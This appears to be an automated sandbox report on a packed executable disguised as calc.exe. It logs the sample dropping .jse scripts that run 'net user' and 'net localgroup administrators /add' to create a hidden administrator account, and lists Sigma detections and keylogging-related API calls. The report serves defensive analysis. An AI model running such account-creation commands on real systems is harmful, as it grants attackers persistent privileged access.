net.exe (PID: 2664 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6528 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 2576 cmdline: "C:\Windows\System32\wscript.exe" rYJ0AO4T7K.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 2280 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 1640 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6364 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 3284 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 1228 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 7132 cmdline: "C:\Windows\System32\wscript.exe" osIg59v0bz.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 4204 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

net.exe (PID: 2128 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6176 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 5464 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 3484 cmdline: "C:\Windows\System32\wscript.exe" BKnQ77VBHl.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 6064 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5712 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 4588 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5148 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 1852 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 6648 cmdline: "C:\Windows\System32\wscript.exe" gszpj8rp81.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 4112 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 3340 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 3728 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 1820 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 3184 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 2272 cmdline: "C:\Windows\System32\wscript.exe" Kiql0emrm5.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 4464 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5720 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 4884 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 1752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 3612 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 4796 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 7140 cmdline: "C:\Windows\System32\wscript.exe" KobIITTimt.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 2280 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 5320 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 1268 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 4004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 4780 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

calc.exe (PID: 4668 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 2F9FDAD776D8626F2CE8625211831E91)

wscript.exe (PID: 4532 cmdline: "C:\Windows\System32\wscript.exe" N0NpXvrAfH.jse MD5: FF00E0480075B095948000BDC66E81F0)

net.exe (PID: 3044 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 2576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 2992 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 5556 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 4616 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

mmc.exe (PID: 2132 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)

mmc.exe (PID: 1908 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)

cleanup

Sigma Signatures

System Summary

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\wscript.exe, SourceProcessId: 3940, StartAddress: 57FEB0, TargetImage: C:\Windows\SysWOW64\net.exe, TargetProcessId: 3940

Sigma detected: Suspicious Calculator Usage

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\calc.exe", CommandLine: "C:\Users\user\Desktop\calc.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\calc.exe, NewProcessName: C:\Users\user\Desktop\calc.exe, OriginalFileName: C:\Users\user\Desktop\calc.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Users\user\Desktop\calc.exe", ProcessId: 7132, ProcessName: calc.exe

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, CommandLine: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\calc.exe", ParentImage: C:\Users\user\Desktop\calc.exe, ParentProcessId: 7132, ParentProcessName: calc.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, ProcessId: 6296, ProcessName: wscript.exe

Sigma detected: Add User to Local Administrators Group

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add, CommandLine: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6296, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add, ProcessId: 6436, ProcessName: net.exe

Sigma detected: New User Created Via Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: "C:\Windows\System32\net.exe" user LocalAdministrator /add, CommandLine: "C:\Windows\System32\net.exe" user LocalAdministrator /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6296, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" user LocalAdministrator /add, ProcessId: 6408, ProcessName: net.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, CommandLine: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\calc.exe", ParentImage: C:\Users\user\Desktop\calc.exe, ParentProcessId: 7132, ParentProcessName: calc.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, ProcessId: 6296, ProcessName: wscript.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "C:\Windows\System32\net.exe" user LocalAdministrator /add, CommandLine: "C:\Windows\System32\net.exe" user LocalAdministrator /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse, ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6296, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" user LocalAdministrator /add, ProcessId: 6408, ProcessName: net.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Machine Learning detection for sample

Source: calc.exe

Joe Sandbox ML: detected

Source: calc.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00425639 FindFirstFileW,FindFirstFileW,SetCurrentDirectoryW,FindClose,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	0_2_00425639
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_004230D5 FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	0_2_004230D5
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0041510D FindFirstFileW,DeleteFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,FindNextFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,	0_2_0041510D
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0042320D FindFirstFileW,FindClose,	0_2_0042320D
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00426292 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00426292
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00425838 FindFirstFileW,FindNextFileW,FindClose,	0_2_00425838
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00422C4D FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_00422C4D
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00414E16 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00414E16
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00414FFA FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,	0_2_00414FFA

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0042A322 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,CloseClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0042A322

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0042A4F2 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0042A4F2

Source: C:\Users\user\Desktop\calc.exe

0_2_0042A322

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0041111C GetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0041111C

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_004045EC GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,GetWindowRect,GetWindowRect,MoveWindow,GetCursorPos,GetCursorPos,TrackPopupMenuEx,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,SetCapture,CharUpperBuffW,ClientToScreen,InvalidateRect,PostMessageW,GetMenuItemInfoW,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,FreeLibrary,DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,CharUpperBuffW,CharUpperBuffW,CharUpperBuffW,CharUpperBuffW,ReleaseCapture,SetWindowTextW,SendMessageW,CharUpperBuffW,CharUpperBuffW,ClientToScreen,

0_2_004045EC

Source: net.exe	Process created: 99
Source: wscript.exe	Process created: 53
Source: net1.exe	Process created: 101
Source: conhost.exe	Process created: 56
Source: calc.exe	Process created: 51

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00424856: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

0_2_00424856

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00415C2E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,SetSystemPowerState,

0_2_00415C2E

Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0043244B	0_2_0043244B
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_004422B6	0_2_004422B6
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00444317	0_2_00444317
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0043A442	0_2_0043A442
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0043E46A	0_2_0043E46A
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_004045EC	0_2_004045EC
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0044E616	0_2_0044E616
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00448776	0_2_00448776
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0044D7D4	0_2_0044D7D4
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00456824	0_2_00456824
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00441961	0_2_00441961
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00442AF9	0_2_00442AF9
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00420D89	0_2_00420D89
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00421E0D	0_2_00421E0D
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00450F74	0_2_00450F74

Source: C:\Users\user\Desktop\calc.exe	Code function: String function: 0044D788 appears 53 times
Source: C:\Users\user\Desktop\calc.exe	Code function: String function: 00416BFE appears 81 times
Source: C:\Users\user\Desktop\calc.exe	Code function: String function: 0044C070 appears 47 times

Source: calc.exe, 00000000.00000003.1235589932.00000000007D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000007.00000003.1245838891.000000000070C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs calc.exe
Source: calc.exe, 00000007.00000003.1245838891.000000000070C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscrip vs calc.exe
Source: calc.exe, 00000007.00000002.1248221393.0000000000720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs calc.exe
Source: calc.exe, 00000007.00000002.1248221393.0000000000720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscrip vs calc.exe
Source: calc.exe, 00000007.00000003.1244144970.00000000006D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000007.00000003.1244144970.00000000006D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamempclient.dllj% vs calc.exe
Source: calc.exe, 0000000F.00000003.1252839134.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000000F.00000003.1252839134.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamempclient.dllj% vs calc.exe
Source: calc.exe, 00000017.00000003.1261640216.000000000081D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000022.00000003.1270987345.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000002C.00000003.1282311199.0000000000639000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000002C.00000003.1282311199.0000000000639000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamempclient.dllj% vs calc.exe
Source: calc.exe, 00000035.00000003.1292765176.0000000000866000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000003D.00000003.1304902557.0000000000569000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000043.00000003.1313907318.0000000000809000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000050.00000003.1327707573.000000000081E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000059.00000003.1338668482.0000000000814000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000060.00000003.1352163228.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000068.00000003.1363260920.00000000005FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000071.00000003.1377712631.0000000000604000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000071.00000003.1381307585.0000000000636000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs calc.exe
Source: calc.exe, 00000078.00000003.1389728447.00000000007F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000080.00000003.1402670999.0000000000714000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000088.00000003.1415545009.0000000000619000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000088.00000003.1419714363.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs calc.exe
Source: calc.exe, 00000088.00000003.1419714363.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs calc.exe
Source: calc.exe, 00000090.00000003.1431082647.0000000000591000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000099.00000003.1445410532.000000000076D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 000000A0.00000003.1458998815.00000000006C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 000000A8.00000002.1495168332.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs calc.exe
Source: calc.exe, 000000A8.00000002.1495168332.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.ex vs calc.exe
Source: calc.exe, 000000A8.00000003.1475603192.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 000000A8.00000003.1482106272.00000000006CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs calc.exe
Source: calc.exe, 000000A8.00000003.1482106272.00000000006CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.ex vs calc.exe
Source: calc.exe, 000000B0.00000003.1493697009.0000000000687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe

Source: calc.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: calc.exe

Static PE information: Section: UPX1 ZLIB complexity 0.9900420984455959

Source: classification engine

Classification label: mal64.winEXE@363/21@0/0

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0041FE6D GetLastError,FormatMessageW,

0_2_0041FE6D

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00415C2E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,SetSystemPowerState,

0_2_00415C2E

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_004240D8 SetErrorMode,GetDiskFreeSpaceW,FreeLibrary,

0_2_004240D8

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00430DCB OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,CoCreateInstanceEx,CoSetProxyBlanket,

0_2_00430DCB

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0041605B FindResourceW,FindResourceW,LoadResource,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0041605B

Source: C:\Users\user\Desktop\calc.exe

File created: C:\Users\user\Desktop\VAJOf7ymJQ.jse

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2888:120:WilError_03
